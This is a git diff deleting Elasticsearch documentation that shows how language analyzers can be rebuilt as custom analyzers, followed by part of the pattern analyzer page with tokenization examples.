"estonian_stemmer": { - "type": "stemmer", - "language": "estonian" - } - }, - "analyzer": { - "rebuilt_estonian": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "estonian_stop", - "estonian_keywords", - "estonian_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"estonian_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: estonian_example, first: estonian, second: rebuilt_estonian}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. 
-<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[finnish-analyzer]] -===== `finnish` analyzer - -The `finnish` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /finnish_example -{ - "settings": { - "analysis": { - "filter": { - "finnish_stop": { - "type": "stop", - "stopwords": "_finnish_" <1> - }, - "finnish_keywords": { - "type": "keyword_marker", - "keywords": ["esimerkki"] <2> - }, - "finnish_stemmer": { - "type": "stemmer", - "language": "finnish" - } - }, - "analyzer": { - "rebuilt_finnish": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "finnish_stop", - "finnish_keywords", - "finnish_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"finnish_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: finnish_example, first: finnish, second: rebuilt_finnish}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[french-analyzer]] -===== `french` analyzer - -The `french` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /french_example -{ - "settings": { - "analysis": { - "filter": { - "french_elision": { - "type": "elision", - "articles_case": true, - "articles": [ - "l", "m", "t", "qu", "n", "s", - "j", "d", "c", "jusqu", "quoiqu", - "lorsqu", "puisqu" - ] - }, - "french_stop": { - "type": "stop", - "stopwords": "_french_" <1> - }, - "french_keywords": { - "type": "keyword_marker", - "keywords": ["Example"] <2> - }, - "french_stemmer": { - "type": "stemmer", - "language": "light_french" - } - }, - "analyzer": { - "rebuilt_french": { - "tokenizer": "standard", - "filter": [ - "french_elision", - "lowercase", - "french_stop", - "french_keywords", - "french_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"french_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: french_example, first: french, second: rebuilt_french}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[galician-analyzer]] -===== `galician` analyzer - -The `galician` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /galician_example -{ - "settings": { - "analysis": { - "filter": { - "galician_stop": { - "type": "stop", - "stopwords": "_galician_" <1> - }, - "galician_keywords": { - "type": "keyword_marker", - "keywords": ["exemplo"] <2> - }, - "galician_stemmer": { - "type": "stemmer", - "language": "galician" - } - }, - "analyzer": { - "rebuilt_galician": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "galician_stop", - "galician_keywords", - "galician_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"galician_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: galician_example, first: galician, second: rebuilt_galician}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. 
-<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[german-analyzer]] -===== `german` analyzer - -The `german` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /german_example -{ - "settings": { - "analysis": { - "filter": { - "german_stop": { - "type": "stop", - "stopwords": "_german_" <1> - }, - "german_keywords": { - "type": "keyword_marker", - "keywords": ["Beispiel"] <2> - }, - "german_stemmer": { - "type": "stemmer", - "language": "light_german" - } - }, - "analyzer": { - "rebuilt_german": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "german_stop", - "german_keywords", - "german_normalization", - "german_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"german_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: german_example, first: german, second: rebuilt_german}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[greek-analyzer]] -===== `greek` analyzer - -The `greek` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /greek_example -{ - "settings": { - "analysis": { - "filter": { - "greek_stop": { - "type": "stop", - "stopwords": "_greek_" <1> - }, - "greek_lowercase": { - "type": "lowercase", - "language": "greek" - }, - "greek_keywords": { - "type": "keyword_marker", - "keywords": ["παράδειγμα"] <2> - }, - "greek_stemmer": { - "type": "stemmer", - "language": "greek" - } - }, - "analyzer": { - "rebuilt_greek": { - "tokenizer": "standard", - "filter": [ - "greek_lowercase", - "greek_stop", - "greek_keywords", - "greek_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"greek_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: greek_example, first: greek, second: rebuilt_greek}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[hindi-analyzer]] -===== `hindi` analyzer - -The `hindi` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /hindi_example -{ - "settings": { - "analysis": { - "filter": { - "hindi_stop": { - "type": "stop", - "stopwords": "_hindi_" <1> - }, - "hindi_keywords": { - "type": "keyword_marker", - "keywords": ["उदाहरण"] <2> - }, - "hindi_stemmer": { - "type": "stemmer", - "language": "hindi" - } - }, - "analyzer": { - "rebuilt_hindi": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "decimal_digit", - "hindi_keywords", - "indic_normalization", - "hindi_normalization", - "hindi_stop", - "hindi_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"hindi_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: hindi_example, first: hindi, second: rebuilt_hindi}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. 
- -[[hungarian-analyzer]] -===== `hungarian` analyzer - -The `hungarian` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /hungarian_example -{ - "settings": { - "analysis": { - "filter": { - "hungarian_stop": { - "type": "stop", - "stopwords": "_hungarian_" <1> - }, - "hungarian_keywords": { - "type": "keyword_marker", - "keywords": ["példa"] <2> - }, - "hungarian_stemmer": { - "type": "stemmer", - "language": "hungarian" - } - }, - "analyzer": { - "rebuilt_hungarian": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "hungarian_stop", - "hungarian_keywords", - "hungarian_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"hungarian_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: hungarian_example, first: hungarian, second: rebuilt_hungarian}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - - -[[indonesian-analyzer]] -===== `indonesian` analyzer - -The `indonesian` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /indonesian_example -{ - "settings": { - "analysis": { - "filter": { - "indonesian_stop": { - "type": "stop", - "stopwords": "_indonesian_" <1> - }, - "indonesian_keywords": { - "type": "keyword_marker", - "keywords": ["contoh"] <2> - }, - "indonesian_stemmer": { - "type": "stemmer", - "language": "indonesian" - } - }, - "analyzer": { - "rebuilt_indonesian": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "indonesian_stop", - "indonesian_keywords", - "indonesian_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"indonesian_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: indonesian_example, first: indonesian, second: rebuilt_indonesian}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. 
- -[[irish-analyzer]] -===== `irish` analyzer - -The `irish` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /irish_example -{ - "settings": { - "analysis": { - "filter": { - "irish_hyphenation": { - "type": "stop", - "stopwords": [ "h", "n", "t" ], - "ignore_case": true - }, - "irish_elision": { - "type": "elision", - "articles": [ "d", "m", "b" ], - "articles_case": true - }, - "irish_stop": { - "type": "stop", - "stopwords": "_irish_" <1> - }, - "irish_lowercase": { - "type": "lowercase", - "language": "irish" - }, - "irish_keywords": { - "type": "keyword_marker", - "keywords": ["sampla"] <2> - }, - "irish_stemmer": { - "type": "stemmer", - "language": "irish" - } - }, - "analyzer": { - "rebuilt_irish": { - "tokenizer": "standard", - "filter": [ - "irish_hyphenation", - "irish_elision", - "irish_lowercase", - "irish_stop", - "irish_keywords", - "irish_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"irish_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: irish_example, first: irish, second: rebuilt_irish}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[italian-analyzer]] -===== `italian` analyzer - -The `italian` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /italian_example -{ - "settings": { - "analysis": { - "filter": { - "italian_elision": { - "type": "elision", - "articles": [ - "c", "l", "all", "dall", "dell", - "nell", "sull", "coll", "pell", - "gl", "agl", "dagl", "degl", "negl", - "sugl", "un", "m", "t", "s", "v", "d" - ], - "articles_case": true - }, - "italian_stop": { - "type": "stop", - "stopwords": "_italian_" <1> - }, - "italian_keywords": { - "type": "keyword_marker", - "keywords": ["esempio"] <2> - }, - "italian_stemmer": { - "type": "stemmer", - "language": "light_italian" - } - }, - "analyzer": { - "rebuilt_italian": { - "tokenizer": "standard", - "filter": [ - "italian_elision", - "lowercase", - "italian_stop", - "italian_keywords", - "italian_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"italian_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: italian_example, first: italian, second: rebuilt_italian}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. 
- -[[latvian-analyzer]] -===== `latvian` analyzer - -The `latvian` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /latvian_example -{ - "settings": { - "analysis": { - "filter": { - "latvian_stop": { - "type": "stop", - "stopwords": "_latvian_" <1> - }, - "latvian_keywords": { - "type": "keyword_marker", - "keywords": ["piemērs"] <2> - }, - "latvian_stemmer": { - "type": "stemmer", - "language": "latvian" - } - }, - "analyzer": { - "rebuilt_latvian": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "latvian_stop", - "latvian_keywords", - "latvian_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"latvian_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: latvian_example, first: latvian, second: rebuilt_latvian}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[lithuanian-analyzer]] -===== `lithuanian` analyzer - -The `lithuanian` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /lithuanian_example -{ - "settings": { - "analysis": { - "filter": { - "lithuanian_stop": { - "type": "stop", - "stopwords": "_lithuanian_" <1> - }, - "lithuanian_keywords": { - "type": "keyword_marker", - "keywords": ["pavyzdys"] <2> - }, - "lithuanian_stemmer": { - "type": "stemmer", - "language": "lithuanian" - } - }, - "analyzer": { - "rebuilt_lithuanian": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "lithuanian_stop", - "lithuanian_keywords", - "lithuanian_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"lithuanian_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: lithuanian_example, first: lithuanian, second: rebuilt_lithuanian}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[norwegian-analyzer]] -===== `norwegian` analyzer - -The `norwegian` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /norwegian_example -{ - "settings": { - "analysis": { - "filter": { - "norwegian_stop": { - "type": "stop", - "stopwords": "_norwegian_" <1> - }, - "norwegian_keywords": { - "type": "keyword_marker", - "keywords": ["eksempel"] <2> - }, - "norwegian_stemmer": { - "type": "stemmer", - "language": "norwegian" - } - }, - "analyzer": { - "rebuilt_norwegian": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "norwegian_stop", - "norwegian_keywords", - "norwegian_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"norwegian_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: norwegian_example, first: norwegian, second: rebuilt_norwegian}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. 
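As the callouts above note, the `_lang_` stopword lists are only defaults. A hypothetical variation of the `norwegian_stop` filter (the index name and word list below are made up for illustration) could use an explicit list instead, or read one from a file:

[source,console]
----
PUT /norwegian_custom_stop_example
{
  "settings": {
    "analysis": {
      "filter": {
        "norwegian_stop": {
          "type": "stop",
          "stopwords": [ "og", "eller", "men" ] <1>
        }
      }
    }
  }
}
----
<1> An inline array replaces the bundled `_norwegian_` list. Alternatively, `stopwords_path` can point to a newline-separated stopword file relative to the Elasticsearch `config` directory.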
- -[[persian-analyzer]] -===== `persian` analyzer - -The `persian` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /persian_example -{ - "settings": { - "analysis": { - "char_filter": { - "zero_width_spaces": { - "type": "mapping", - "mappings": [ "\\u200C=>\\u0020"] <1> - } - }, - "filter": { - "persian_stop": { - "type": "stop", - "stopwords": "_persian_" <2> - } - }, - "analyzer": { - "rebuilt_persian": { - "tokenizer": "standard", - "char_filter": [ "zero_width_spaces" ], - "filter": [ - "lowercase", - "decimal_digit", - "arabic_normalization", - "persian_normalization", - "persian_stop" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: persian_example, first: persian, second: rebuilt_persian}\nendyaml\n/] - -<1> Replaces zero-width non-joiners with an ASCII space. -<2> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. - -[[portuguese-analyzer]] -===== `portuguese` analyzer - -The `portuguese` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /portuguese_example -{ - "settings": { - "analysis": { - "filter": { - "portuguese_stop": { - "type": "stop", - "stopwords": "_portuguese_" <1> - }, - "portuguese_keywords": { - "type": "keyword_marker", - "keywords": ["exemplo"] <2> - }, - "portuguese_stemmer": { - "type": "stemmer", - "language": "light_portuguese" - } - }, - "analyzer": { - "rebuilt_portuguese": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "portuguese_stop", - "portuguese_keywords", - "portuguese_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"portuguese_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: portuguese_example, first: portuguese, second: rebuilt_portuguese}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[romanian-analyzer]] -===== `romanian` analyzer - -The `romanian` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /romanian_example -{ - "settings": { - "analysis": { - "filter": { - "romanian_stop": { - "type": "stop", - "stopwords": "_romanian_" <1> - }, - "romanian_keywords": { - "type": "keyword_marker", - "keywords": ["exemplu"] <2> - }, - "romanian_stemmer": { - "type": "stemmer", - "language": "romanian" - } - }, - "analyzer": { - "rebuilt_romanian": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "romanian_stop", - "romanian_keywords", - "romanian_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"romanian_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: romanian_example, first: romanian, second: rebuilt_romanian}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. 
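Once defined, a rebuilt analyzer is used like any other custom analyzer: by referencing it from a field mapping. The following sketch is for illustration only (the `content` field is made up) and assumes the `romanian_example` index created above exists:

[source,console]
----
PUT /romanian_example/_mapping
{
  "properties": {
    "content": {
      "type": "text",
      "analyzer": "rebuilt_romanian" <1>
    }
  }
}
----
<1> Values indexed into `content`, and query strings run against it, both go through `rebuilt_romanian` because no separate `search_analyzer` is specified.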
- - -[[russian-analyzer]] -===== `russian` analyzer - -The `russian` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /russian_example -{ - "settings": { - "analysis": { - "filter": { - "russian_stop": { - "type": "stop", - "stopwords": "_russian_" <1> - }, - "russian_keywords": { - "type": "keyword_marker", - "keywords": ["пример"] <2> - }, - "russian_stemmer": { - "type": "stemmer", - "language": "russian" - } - }, - "analyzer": { - "rebuilt_russian": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "russian_stop", - "russian_keywords", - "russian_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"russian_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: russian_example, first: russian, second: rebuilt_russian}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[sorani-analyzer]] -===== `sorani` analyzer - -The `sorani` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /sorani_example -{ - "settings": { - "analysis": { - "filter": { - "sorani_stop": { - "type": "stop", - "stopwords": "_sorani_" <1> - }, - "sorani_keywords": { - "type": "keyword_marker", - "keywords": ["mînak"] <2> - }, - "sorani_stemmer": { - "type": "stemmer", - "language": "sorani" - } - }, - "analyzer": { - "rebuilt_sorani": { - "tokenizer": "standard", - "filter": [ - "sorani_normalization", - "lowercase", - "decimal_digit", - "sorani_stop", - "sorani_keywords", - "sorani_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"sorani_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: sorani_example, first: sorani, second: rebuilt_sorani}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[spanish-analyzer]] -===== `spanish` analyzer - -The `spanish` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /spanish_example -{ - "settings": { - "analysis": { - "filter": { - "spanish_stop": { - "type": "stop", - "stopwords": "_spanish_" <1> - }, - "spanish_keywords": { - "type": "keyword_marker", - "keywords": ["ejemplo"] <2> - }, - "spanish_stemmer": { - "type": "stemmer", - "language": "light_spanish" - } - }, - "analyzer": { - "rebuilt_spanish": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "spanish_stop", - "spanish_keywords", - "spanish_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"spanish_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: spanish_example, first: spanish, second: rebuilt_spanish}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. 
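Several of these rebuilds pass a "light" value to the `stemmer` filter (for example `light_italian`, `light_portuguese`, `light_spanish`), while others use the plain language name. The `stemmer` token filter supports more than one algorithm for many languages, so a sketch like the following (hypothetical index name) would switch the Spanish example to the heavier `spanish` stemmer just by changing the `language` value:

[source,console]
----
PUT /spanish_heavy_stemmer_example
{
  "settings": {
    "analysis": {
      "filter": {
        "spanish_stemmer": {
          "type": "stemmer",
          "language": "spanish" <1>
        }
      }
    }
  }
}
----
<1> `spanish` selects a more aggressive stemming algorithm than the `light_spanish` one used by the built-in `spanish` analyzer, so the resulting tokens will no longer match the built-in analyzer's output.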
- -[[swedish-analyzer]] -===== `swedish` analyzer - -The `swedish` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /swedish_example -{ - "settings": { - "analysis": { - "filter": { - "swedish_stop": { - "type": "stop", - "stopwords": "_swedish_" <1> - }, - "swedish_keywords": { - "type": "keyword_marker", - "keywords": ["exempel"] <2> - }, - "swedish_stemmer": { - "type": "stemmer", - "language": "swedish" - } - }, - "analyzer": { - "rebuilt_swedish": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "swedish_stop", - "swedish_keywords", - "swedish_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"swedish_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: swedish_example, first: swedish, second: rebuilt_swedish}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[turkish-analyzer]] -===== `turkish` analyzer - -The `turkish` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /turkish_example -{ - "settings": { - "analysis": { - "filter": { - "turkish_stop": { - "type": "stop", - "stopwords": "_turkish_" <1> - }, - "turkish_lowercase": { - "type": "lowercase", - "language": "turkish" - }, - "turkish_keywords": { - "type": "keyword_marker", - "keywords": ["örnek"] <2> - }, - "turkish_stemmer": { - "type": "stemmer", - "language": "turkish" - } - }, - "analyzer": { - "rebuilt_turkish": { - "tokenizer": "standard", - "filter": [ - "apostrophe", - "turkish_lowercase", - "turkish_stop", - "turkish_keywords", - "turkish_stemmer" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"turkish_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: turkish_example, first: turkish, second: rebuilt_turkish}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. -<2> This filter should be removed unless there are words which should - be excluded from stemming. - -[[thai-analyzer]] -===== `thai` analyzer - -The `thai` analyzer could be reimplemented as a `custom` analyzer as follows: - -[source,console] ----------------------------------------------------- -PUT /thai_example -{ - "settings": { - "analysis": { - "filter": { - "thai_stop": { - "type": "stop", - "stopwords": "_thai_" <1> - } - }, - "analyzer": { - "rebuilt_thai": { - "tokenizer": "thai", - "filter": [ - "lowercase", - "decimal_digit", - "thai_stop" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/"thai_keywords",//] -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: thai_example, first: thai, second: rebuilt_thai}\nendyaml\n/] - -<1> The default stopwords can be overridden with the `stopwords` - or `stopwords_path` parameters. 
diff --git a/docs/reference/analysis/analyzers/pattern-analyzer.asciidoc b/docs/reference/analysis/analyzers/pattern-analyzer.asciidoc deleted file mode 100644 index 7327cee996f..00000000000 --- a/docs/reference/analysis/analyzers/pattern-analyzer.asciidoc +++ /dev/null @@ -1,411 +0,0 @@ -[[analysis-pattern-analyzer]] -=== Pattern analyzer -++++ -Pattern -++++ - -The `pattern` analyzer uses a regular expression to split the text into terms. -The regular expression should match the *token separators* not the tokens -themselves. The regular expression defaults to `\W+` (or all non-word characters). - -[WARNING] -.Beware of Pathological Regular Expressions -======================================== - -The pattern analyzer uses -https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html[Java Regular Expressions]. - -A badly written regular expression could run very slowly or even throw a -StackOverflowError and cause the node it is running on to exit suddenly. - -Read more about https://www.regular-expressions.info/catastrophic.html[pathological regular expressions and how to avoid them]. - -======================================== - -[discrete] -=== Example output - -[source,console] ---------------------------- -POST _analyze -{ - "analyzer": "pattern", - "text": "The 2 QUICK Brown-Foxes jumped over the lazy dog's bone." -} ---------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "the", - "start_offset": 0, - "end_offset": 3, - "type": "word", - "position": 0 - }, - { - "token": "2", - "start_offset": 4, - "end_offset": 5, - "type": "word", - "position": 1 - }, - { - "token": "quick", - "start_offset": 6, - "end_offset": 11, - "type": "word", - "position": 2 - }, - { - "token": "brown", - "start_offset": 12, - "end_offset": 17, - "type": "word", - "position": 3 - }, - { - "token": "foxes", - "start_offset": 18, - "end_offset": 23, - "type": "word", - "position": 4 - }, - { - "token": "jumped", - "start_offset": 24, - "end_offset": 30, - "type": "word", - "position": 5 - }, - { - "token": "over", - "start_offset": 31, - "end_offset": 35, - "type": "word", - "position": 6 - }, - { - "token": "the", - "start_offset": 36, - "end_offset": 39, - "type": "word", - "position": 7 - }, - { - "token": "lazy", - "start_offset": 40, - "end_offset": 44, - "type": "word", - "position": 8 - }, - { - "token": "dog", - "start_offset": 45, - "end_offset": 48, - "type": "word", - "position": 9 - }, - { - "token": "s", - "start_offset": 49, - "end_offset": 50, - "type": "word", - "position": 10 - }, - { - "token": "bone", - "start_offset": 51, - "end_offset": 55, - "type": "word", - "position": 11 - } - ] -} ----------------------------- - -///////////////////// - - -The above sentence would produce the following terms: - -[source,text] ---------------------------- -[ the, 2, quick, brown, foxes, jumped, over, the, lazy, dog, s, bone ] ---------------------------- - -[discrete] -=== Configuration - -The `pattern` analyzer accepts the following parameters: - -[horizontal] -`pattern`:: - - A https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html[Java regular expression], defaults to `\W+`. - -`flags`:: - - Java regular expression https://docs.oracle.com/javase/8/docs/api/java/util/regex/Pattern.html#field.summary[flags]. - Flags should be pipe-separated, eg `"CASE_INSENSITIVE|COMMENTS"`. - -`lowercase`:: - - Should terms be lowercased or not. Defaults to `true`. 
- -`stopwords`:: - - A pre-defined stop words list like `_english_` or an array containing a - list of stop words. Defaults to `_none_`. - -`stopwords_path`:: - - The path to a file containing stop words. - -See the <> for more information -about stop word configuration. - - -[discrete] -=== Example configuration - -In this example, we configure the `pattern` analyzer to split email addresses -on non-word characters or on underscores (`\W|_`), and to lower-case the result: - -[source,console] ----------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "my_email_analyzer": { - "type": "pattern", - "pattern": "\\W|_", <1> - "lowercase": true - } - } - } - } -} - -POST my-index-000001/_analyze -{ - "analyzer": "my_email_analyzer", - "text": "John_Smith@foo-bar.com" -} ----------------------------- - -<1> The backslashes in the pattern need to be escaped when specifying the - pattern as a JSON string. - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "john", - "start_offset": 0, - "end_offset": 4, - "type": "word", - "position": 0 - }, - { - "token": "smith", - "start_offset": 5, - "end_offset": 10, - "type": "word", - "position": 1 - }, - { - "token": "foo", - "start_offset": 11, - "end_offset": 14, - "type": "word", - "position": 2 - }, - { - "token": "bar", - "start_offset": 15, - "end_offset": 18, - "type": "word", - "position": 3 - }, - { - "token": "com", - "start_offset": 19, - "end_offset": 22, - "type": "word", - "position": 4 - } - ] -} ----------------------------- - -///////////////////// - - -The above example produces the following terms: - -[source,text] ---------------------------- -[ john, smith, foo, bar, com ] ---------------------------- - -[discrete] -==== CamelCase tokenizer - -The following more complicated example splits CamelCase text into tokens: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "analyzer": { - "camel": { - "type": "pattern", - "pattern": "([^\\p{L}\\d]+)|(?<=\\D)(?=\\d)|(?<=\\d)(?=\\D)|(?<=[\\p{L}&&[^\\p{Lu}]])(?=\\p{Lu})|(?<=\\p{Lu})(?=\\p{Lu}[\\p{L}&&[^\\p{Lu}]])" - } - } - } - } -} - -GET my-index-000001/_analyze -{ - "analyzer": "camel", - "text": "MooseX::FTPClass2_beta" -} --------------------------------------------------- - -///////////////////// - -[source,console-result] ----------------------------- -{ - "tokens": [ - { - "token": "moose", - "start_offset": 0, - "end_offset": 5, - "type": "word", - "position": 0 - }, - { - "token": "x", - "start_offset": 5, - "end_offset": 6, - "type": "word", - "position": 1 - }, - { - "token": "ftp", - "start_offset": 8, - "end_offset": 11, - "type": "word", - "position": 2 - }, - { - "token": "class", - "start_offset": 11, - "end_offset": 16, - "type": "word", - "position": 3 - }, - { - "token": "2", - "start_offset": 16, - "end_offset": 17, - "type": "word", - "position": 4 - }, - { - "token": "beta", - "start_offset": 18, - "end_offset": 22, - "type": "word", - "position": 5 - } - ] -} ----------------------------- - -///////////////////// - - -The above example produces the following terms: - -[source,text] ---------------------------- -[ moose, x, ftp, class, 2, beta ] ---------------------------- - -The regex above is easier to understand as: - -[source,regex] --------------------------------------------------- - ([^\p{L}\d]+) # swallow non letters and numbers, -| (?<=\D)(?=\d) # or non-number followed by number, 
